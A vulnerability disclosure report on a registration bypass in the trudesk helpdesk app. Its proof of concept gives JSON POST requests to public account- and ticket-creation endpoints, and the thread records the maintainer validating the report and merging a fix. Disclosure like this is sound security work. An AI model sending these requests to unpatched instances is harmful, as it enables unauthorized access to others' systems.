Register users in spite of Allow User Registration disabled in polonel/trudesk

Valid

Reported on

May 12th 2022


Description

Attacker can register a user in spite of the Allow User Registration is disable by default.

Proof of Concept

  1. Go to /captcha, get the captcha value and cookie. alt text
  2. Send POST request to (/api/v1/public/account/create) with the value of captcha and cookie in step 1.
    //POST HOST/api/v1/public/account/create
{
    "user": {
        "fullname": "uname",
        "email": "test@gmail.com",
        "password": "passwd"
    },
    "captcha": "captcha"
}

alt text

  1. Register successfuly.

Note

Same POC with endpoint Create New Ticket(/api/v1/public/tickets/create)

{"user":{"fullname":"tpa tpa2","email":"test@gmail.com"},"ticket":{"subject":"123","issue":"123"},"captcha":"Dazr"}

Impact

Attacker can register a user and get inside the dashboard.

We are processing your report and will contact the polonel/trudesk team within 24 hours. a month ago
tienpa99 modified the report
a month ago
tienpa99 modified the report
a month ago
tienpa99 modified the report
a month ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back a month ago
Chris Brame
a month ago

Maintainer


Can you try the same request once you log out of the app as yourself? It's using your permissions since you're logged in.

Chris Brame
a month ago

Maintainer


Actually, I see the issue. I will publish a fix soon.

Chris Brame validated this vulnerability a month ago
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a month ago
Chris Brame confirmed that a fix has been merged on 49befa a month ago
Chris Brame has been awarded the fix bounty
tienpa99
a month ago

Researcher


Confirm the bug has been fixed.

to join this conversation